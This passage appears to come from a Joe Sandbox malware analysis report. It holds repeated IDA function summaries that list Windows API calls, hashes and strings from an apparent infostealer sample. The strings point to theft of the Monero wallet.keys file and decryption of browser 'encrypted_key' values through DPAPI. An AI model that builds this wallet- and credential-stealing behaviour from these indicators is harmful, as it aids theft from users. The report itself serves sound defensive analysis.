                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: c8bca2c186ef9cda46be23cdc5e0d69ba9fc438e23b69b5f0368e9462ddf4808
                              • Instruction ID: 5ef11e5ac72541ba97acbc38d02fe2a1fafba77e28370ebebd7c4167d954b4bb
                              • Opcode Fuzzy Hash: c8bca2c186ef9cda46be23cdc5e0d69ba9fc438e23b69b5f0368e9462ddf4808
                              • Instruction Fuzzy Hash: BF3130B1C01218ABDB54EB50DC91FDE7778AF84300F404189F20967291DF746B89CF5A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E28,00000000,?), ref: 0094882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00948836
                              • wsprintfA.USER32 ref: 00948850
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 7739379b8e0b8ee5ca7a24a0327f689610408da5c553e874408186724d81cce4
                              • Instruction ID: f8149925322e660cdcb3e02c22269b2b49f6234f4054d20cecd45669f7074308
                              • Opcode Fuzzy Hash: 7739379b8e0b8ee5ca7a24a0327f689610408da5c553e874408186724d81cce4
                              • Instruction Fuzzy Hash: 7E2142B1E40204AFDB44DFD4DD45FAEBBB8FB88701F104159F609A7280CB79A941CBA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0094951E,00000000), ref: 00948D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00948D62
                              • wsprintfW.USER32 ref: 00948D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                               • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 39a21b5e21a297be19598b4a067ef0df70ad014a7845b17ab89c119d483daae1
                              • Instruction ID: 2b3acd3e2186c984837a1c42018760e4f07c01690cb3dfa78ae20073a18ad9bc
                              • Opcode Fuzzy Hash: 39a21b5e21a297be19598b4a067ef0df70ad014a7845b17ab89c119d483daae1
                              • Instruction Fuzzy Hash: 60E08CB0A40208BBC740DB94DC0AE6D77BCEB84702F040094FE0D87280DE719E408BA2
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0093A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0093A6BC
                                • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0093A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: bebad33425f71dc38c446e8fe2c22a1c004702e63dcc776d08ae00accdf4f7d5
                              • Instruction ID: b08f38d13b32de1721b6118215285e6a82169c1ee6d0879f59621966dee58808
                              • Opcode Fuzzy Hash: bebad33425f71dc38c446e8fe2c22a1c004702e63dcc776d08ae00accdf4f7d5
                              • Instruction Fuzzy Hash: B3E1EE72850108AAEB19FBA4DC92FEE7338EF94304F508159F517721A1EF306A4DCB66
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D481
                              • lstrlen.KERNEL32(00000000), ref: 0093D698
                              • lstrlen.KERNEL32(00000000), ref: 0093D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0093D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fb405a01e81ba53251b016149c2ea164eefcc8dc180a6cd4bec05d195abc9d4f
                              • Instruction ID: 1bc8b290c38fbf7a5a19a108cc2073ce6f91e19f8795707a4caa0bb6cfa5f96a
                              • Opcode Fuzzy Hash: fb405a01e81ba53251b016149c2ea164eefcc8dc180a6cd4bec05d195abc9d4f
                              • Instruction Fuzzy Hash: AA910F728501089BEB14FBA0DC92FEE7339EF94304F514568F507A61A2EF346A49CB66
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,010F9920,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,010F8A98,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D801
                              • lstrlen.KERNEL32(00000000), ref: 0093D99F
                              • lstrlen.KERNEL32(00000000), ref: 0093D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0093DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 1b7dd4a382ef6cfae66dddd7f90f34e29a31e255d67c86d084ce9504b3b6341a
                              • Instruction ID: fbdb468f545a2bdcb400c4a9bbb7eecfb2339c081e41fa46790f462b5c6731ad
                              • Opcode Fuzzy Hash: 1b7dd4a382ef6cfae66dddd7f90f34e29a31e255d67c86d084ce9504b3b6341a
                              • Instruction Fuzzy Hash: 698111729501089BEB04FBA0DC96FEE7339EF94304F514518F407A71A2EF346A49CB66
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: db9de390c7b219edfd3bf82083ffd5c90eb19670c462fabef9694cb0a23a2020
                              • Instruction ID: ea4d03739acc02c9b9f41a16bc4ee2b3df76877e8c3966a8e47755afc668df90
                              • Opcode Fuzzy Hash: db9de390c7b219edfd3bf82083ffd5c90eb19670c462fabef9694cb0a23a2020
                              • Instruction Fuzzy Hash: 96412D71D10109ABDB14EFB5D896EEEB778AB84304F108418E41667291DB75AA09CFA2
                              APIs
                                • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                • Part of subcall function 00939B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                                • Part of subcall function 00939B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                                • Part of subcall function 00939B60: LocalFree.KERNEL32(?), ref: 00939BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 58e78a3ac16cb172c4c80ad30f4c1eb017e8a80813a1169a7a729943a6157acd
                              • Instruction ID: c8af3f5e1b60a800a4001ba392221c013c42f2e19d46624277c1566ef8eb8968
                              • Opcode Fuzzy Hash: 58e78a3ac16cb172c4c80ad30f4c1eb017e8a80813a1169a7a729943a6157acd
                              • Instruction Fuzzy Hash: 833100B6D10109ABDB14DFE4DC86FEFB7B8AB88304F144519F915A7281EB749A04CFA1
                              APIs
                              • CreateFileA.KERNEL32(00943AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00943AEE,?), ref: 009492FC
                              • GetFileSizeEx.KERNEL32(000000FF,00943AEE), ref: 00949319
                              • CloseHandle.KERNEL32(000000FF), ref: 00949327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: ef42410a7879e723c8f79b48d3151d7b1230e55b37d4124f9445c0fd5232a3ad
                              • Instruction ID: d2d04edd7850801fd55890d072ec87c89f1bd51c93827dd2ec9e282dfeea4a8f
                              • Opcode Fuzzy Hash: ef42410a7879e723c8f79b48d3151d7b1230e55b37d4124f9445c0fd5232a3ad
                              • Instruction Fuzzy Hash: 2DF04935E44208BBDF24DFB0DC59F9E77B9AB88721F10C654BA55A72C0DA74AB418B40
                              APIs
                              • __getptd.LIBCMT ref: 0094C74E
                                • Part of subcall function 0094BF9F: __amsg_exit.LIBCMT ref: 0094BFAF
                              • __getptd.LIBCMT ref: 0094C765
                              • __amsg_exit.LIBCMT ref: 0094C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0094C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                              • Associated: 00000000.00000002.2257183629.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257198305.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E13000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E1A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257369113.0000000000E29000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257627085.0000000000E2A000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257732387.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2257750006.0000000000FC5000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_930000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 80401290d4cc76de7a9f88ceee617eec47897d6f070137cc60a8d4c92559f34c
                              • Instruction ID: 97f6e0c038feaa8d3a2f1dc1cf9558e3241c10059a3c46d65a2f39de8c19853f
                              • Opcode Fuzzy Hash: 80401290d4cc76de7a9f88ceee617eec47897d6f070137cc60a8d4c92559f34c
                              • Instruction Fuzzy Hash: 08F0E9729467009FD760BBB85807F5D33E06F80721F204289F408B71D3DF6499419F56
                              APIs
                                • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00944F7A
                              • lstrcat.KERNEL32(?,00951070), ref: 00944F97
                              • lstrcat.KERNEL32(?,010F8A58), ref: 00944FAB
                              • lstrcat.KERNEL32(?,00951074), ref: 00944FBD
                                • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
